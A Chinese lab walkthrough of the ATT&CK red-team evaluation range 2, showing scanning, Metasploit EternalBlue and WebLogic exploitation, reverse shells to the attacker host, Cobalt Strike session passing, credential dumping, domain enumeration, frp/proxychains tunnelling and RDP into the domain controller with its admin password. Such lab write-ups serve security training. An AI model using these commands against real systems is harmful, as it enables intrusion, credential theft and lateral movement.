拓扑图
环境搭建
WEB.de1ay.com
“
delay通过默认密码登录不上去,可以使用webadministrator(密码为空)登录本机,再为delay账户重新设置为默认密码(1qaz@WSX)
HEU_KMS软件激活(选择重置windows)
netsh advfirewall show currentprofile查看防火墙状态->开启
启动weblogic(默认端口7001)
C:OracleMiddlewareuser_projectsdomainsbase_domainstartWebLogic
netstat -an | findstr 7001正常运行
DC
“
默认密码(1qaz@WSX)
netsh advfirewall show currentprofile查看防火墙状态->开启
兼顾DC域&DNS服务器
PC
“
默认密码(1qaz@WSX)
netsh advfirewall show currentprofile查看防火墙状态->开启
外围打点
nmap -v -T4 -p- -A -oN ATT_02.log 192.168.30.131
#-v:
#-A:综合扫描
#-p-:全部端口
#-T4:扫描速度(相对较快)
#-v:详细信息
#-oN ATT_02.log:扫描结果保存
扫描结果
“
3389-远程桌面服务(RDP)
445-文件共享服务(SMB协议)
1433-Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
7001-weblogic
OS:Windows Server 2008 R2 Standard
攻击思路
3389:暴力破解、端口漏洞利用、
445:永恒之蓝
7001:java架构漏洞
1433:searchsploit
“
searchsploit
-t标题
-m镜像到...
-w 脚本url网址
脚本镜像到本地
3389
检查模块,dos攻击蓝屏,不能拿到shell,不用这个模块攻击了
msf6 > search ms12-020 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/ms12_020_check . normal Yes MS12-020 Microsoft Remote Desktop Checker 1 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids msf6 > use 0 msf6 auxiliary(scanner/rdp/ms12_020_check) > options Module options (auxiliary/scanner/rdp/ms12_020_check): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 3389 yes Remote port running RDP (TCP) THREADS 1 yes The number of concurrent threads (max one per host) View the full module info with the info, or info -d command. msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.30.131 rhosts => 192.168.30.131 msf6 auxiliary(scanner/rdp/ms12_020_check) > run [+] 192.168.30.131:3389 - 192.168.30.131:3389 - The target is vulnerable. [*] 192.168.30.131:3389 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/rdp/ms12_020_check) >
445
msf6 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 _ target: Automatic Target . . . . 2 _ target: Windows 7 . . . . 3 _ target: Windows Embedded Standard 7 . . . . 4 _ target: Windows Server 2008 R2 . . . . 5 _ target: Windows 8 . . . . 6 _ target: Windows 8.1 . . . . 7 _ target: Windows Server 2012 . . . . 8 _ target: Windows 10 Pro . . . . 9 _ target: Windows 10 Enterprise Evaluation . . . . 10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 11 _ target: Automatic . . . . 12 _ target: PowerShell . . . . 13 _ target: Native upload . . . . 14 _ target: MOF upload . . . . 15 _ AKA: ETERNALSYNERGY . . . . 16 _ AKA: ETERNALROMANCE . . . . 17 _ AKA: ETERNALCHAMPION . . . . 18 _ AKA: ETERNALBLUE . . . . 19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 20 _ AKA: ETERNALSYNERGY . . . . 21 _ AKA: ETERNALROMANCE . . . . 22 _ AKA: ETERNALCHAMPION . . . . 23 _ AKA: ETERNALBLUE . . . . 24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection 25 _ AKA: DOUBLEPULSAR . . . . 26 _ AKA: ETERNALBLUE . . . . 27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution 28 _ target: Execute payload (x64) . . . . 29 _ target: Neutralize implant . . . . Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant' msf6 > use 0 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, W indows Embedded Standard 7 target machines. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windo ws Embedded Standard 7 target machines. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedde d Standard 7 target machines. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.30.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target View the full module info with the info, or info -d command. msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tc [-] The value specified for payload is not valid. msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.30.131 rhosts => 192.168.30.131 msf6 exploit(windows/smb/ms17_010_eternalblue) > msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.30.128:4444 [*] 192.168.30.131:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.30.131:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit) [*] 192.168.30.131:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.30.131:445 - The target is vulnerable. [*] 192.168.30.131:445 - Connecting to target for exploitation. [+] 192.168.30.131:445 - Connection established for exploitation. [+] 192.168.30.131:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.30.131:445 - CORE raw buffer dump (51 bytes) [*] 192.168.30.131:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 192.168.30.131:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard [*] 192.168.30.131:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac [*] 192.168.30.131:445 - 0x00000030 6b 20 31 k 1 [+] 192.168.30.131:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.30.131:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.30.131:445 - Sending all but last fragment of exploit packet [-] 192.168.30.131:445 - Errno::ECONNRESET: Connection reset by peer [*] Exploit completed, but no session was created.
360拦截
“
可以选择关闭360再次run
chcp 65001解决乱码问题
exit退出
background:会话放到后台
session:会话编号
session -i 会话编号#进入会话
session -k 会话编号#关闭会话
漏洞利用
7001
自动化工具
哥斯拉连接,拿到shell,进行信息收集,权限比较低
weblogic漏洞检测脚本
[*] =========Task Start=========
[+] [192.168.30.131:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.30.131:7001] Weblogic console address is exposed! The path is: http://192.168.30.131:7001/console/login/LoginForm.jsp
[+] [192.168.30.131:7001] Weblogic UDDI module is exposed! The path is: http://192.168.30.131:7001/uddiexplorer/
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2017-3506
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
CVE-2019-2725
未成功
可以看到weblogic版本为10.3.6.0
拿kali工具挨个打
结果发现没几个是能成功的,searchsploit -w weblogic 10.3.6.0
打开网站,过滤下能用的发现只有44553可以,这个利用方法在另一篇文章已经写过,本篇不再复现
上线msf会话
续哥斯拉连接,跟着哥斯拉提示去输入,点击go,msf上线
提权
migrate 492 进程迁移到system权限进程
上线CS
新建监听器
团队服务器(攻击机:你的kali)就会开启8088端口
将msf会话传递给cs
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WEBde1ay @ WEB 192.168.30.128:9999 -> 192.168.30.131:63910 (192.168.30.131)
msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.30.128
lhost => 192.168.30.128
msf6 exploit(windows/local/payload_inject) > set lport 8088
lport => 8088
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set PrependMigrate true
PrependMigrate => true
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > run
[*] Running module against WEB
[*] Spawned Notepad process 5080
[*] Injecting payload into 5080
[*] Preparing 'windows/meterpreter/reverse_http' for PID 5080
msf6 exploit(windows/local/payload_inject) >
成功上线
调整sleep时间
内网信息收集
执行系统命令,前面加shell
获取密码hashdump
抓取明文密码logonpasswords
查询域内其他用户shell net user /domain
查看域管理员用户shell net group "domain admins" /domain
查看域内主机shell net group "domain computers" /domain
查看域控制器shell net group "domain controllers" /domain
定位域控shell ping DC
内网扫描:portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024
“
域控:
DC 10.10.10.10
两台主机:
PC 10.10.10.201
WEB 10.10.10.128
域管理员:Administrator
其他用户:de1ay Guest krbtgt mssql
frp部署
“
frpc放到内网所在机器上
frps放到公网IP机器上
frps:
[common]
bind_addr = 0.0.0.0 #服务端监听IP
bind_port = 7000 #服务端监听端口
[socks5]
type = tcp
remote_port = 1080 #socks5代理服务端口
plugin = socks5 #socks5代理插件
frpc:
[common]
server_addr = 192.168.30.128 #攻击端IP
server_port = 7000 #攻击端监听端口
[socks5]
type = tcp
remote_port = 1080 #socks5代理端口
plugin = socks5 #使用socks5代理插件
cs进行文件上传frpc.ini
和frpc.exe
两个文件
kali的远程桌面连接去启动
此时kali也会建立1080端口
kali并没有10网段,此时去ping10.10.10.10域控,能够到达
proxychains部署
vim /etc/proxychains4.conf
文件末尾注释掉socks4,添加socks5 127.0.0.1 1080
这里我们不能连接到DC域控
而使用proxychains4就可以登录,但是没有登录界面
后面查了资料发现,rdesktop无网络级别身份验证
那我们使用xfreerdp连接,可以看到这边我们是正常的
proxychains4 xfreerdp /u:administrator /d:de1ay /p:1qaz@WSX /sec:rdp /v:10.10.10.10 /cert-ignore
全局代理proxychains4 bash
完结
原文始发于微信公众号(flowers-boy):ATT&CK红队评估实战靶场二
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论